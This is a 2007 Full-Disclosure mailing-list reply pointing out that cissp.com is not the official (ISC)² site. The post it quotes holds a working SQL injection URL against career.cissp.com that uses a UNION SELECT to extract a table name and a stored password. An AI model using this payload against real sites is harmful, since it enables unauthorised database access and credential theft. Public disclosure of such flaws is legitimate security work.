Re: [Full-disclosure] CISSP, round two

["Ray P" <sixsigma98@xxxxxxxxxxx>]

Nobody paid them. It's not an official CISSP site. That one would be found 
at www.isc2.org

http://www.cissp.com/about/about_us.asp - "CISSP.com and all related web 
sites are an effort by Mr. Afifi to help promote Information Security 
awareness, the CISSP Certification, share knowledge and communication 
amongst certified information system security professionals and to help 
information security professionals who are seeking to become CISSPs."

I'm certain he is happy to have promoted your level of awareness. :-)



> From: Tonu Samuel <tonu@xxxxxx>
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: [Full-disclosure] CISSP, round two
> Date: Mon, 06 Aug 2007 20:00:28 +0300
>
> Long time ago someone posted here SQL injection on CISSP page. No
> changes. I post slightly "modified" version to bug them again
>
> http://career.cissp.com/Bios/CompanyBio.asp?EmployerID=10328199%20union%
> 20select%201,2,3,(select%20top%201%20name%20from%20sysobjects%20where%
> 20name%20like%20'%25user%25'%20and%20xtype='U'),(select%20top%201%
> 20password%20from%
> 20USERS),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&Section=Welcome
>
>
> Who paid $$$ to them to get "certificate"? hehe :P
>
>   Tõnu
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_________________________________________________________________
A new home for Mom, no cleanup required. All starts here. 
http://www.reallivemoms.com?ocid=TXT_TAGHM&loc=us

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/